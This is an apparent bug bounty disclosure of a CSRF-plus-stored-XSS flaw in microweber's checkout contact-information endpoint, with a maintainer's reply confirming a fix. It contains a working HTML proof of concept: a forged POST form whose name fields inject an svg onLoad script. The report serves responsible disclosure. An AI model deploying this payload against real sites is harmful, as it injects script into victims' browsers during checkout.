Cross-site Scripting (XSS) - Stored in microweber/microweber
Reported on
Jun 25th 2021
✍️ Description
Hello, I found CSRF + XSS on website so the impact of XSS could be presented.
There is no CSRF token or protection on: http://example.microweber.me/checkout/contact-information-save CSRF HTML PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.microweber.me/checkout/contact-information-save" method="POST">
<input type="hidden" name="first_name" value=""><svg onLoad=alert(5555)>" />
<input type="hidden" name="last_name" value=""><svg onLoad=alert(5555)>" />
<input type="hidden" name="email" value="asdf@gmail.com" />
<input type="hidden" name="phone" value="000000000" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
and when we submit request XSS gets executed at the same time. Also personal information always stay there so it counts as Stored XSS
Video of me showing everything: https://youtu.be/H9XTNUzdtHg
💥 Impact
JS executed on victims browser while the person is in Checkout
Occurrences
References
Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!
Hello, thank for the report, this is a valid issue and has been fixed now in this commit https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf